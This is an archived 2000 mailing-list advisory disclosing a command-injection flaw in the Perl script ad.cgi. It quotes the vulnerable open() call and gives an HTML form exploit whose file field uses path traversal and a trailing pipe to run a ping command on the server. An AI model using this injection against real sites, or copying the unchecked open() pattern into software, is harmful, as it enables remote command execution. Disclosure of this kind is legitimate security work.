OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Insecure input validation in ad.cgi
From: rpc (hCKZ.ORG)
Date: Mon Dec 11 2000 - 09:10:22 CST


Hi,

ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure input validation
vulnerability.

Information on ad.cgi is available at:
http://www.conservatives.net/atheist/scripts/index.html?ads

----code snippet----
$filename = "$FORM{'file'}";
$datafile = "$basedir" . "$filename";
...
open (INFO, "$datafile");
-----------------

Exploit:

<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c
5 www.foo.com|">
<input type=submit value=run>
</form>
</html>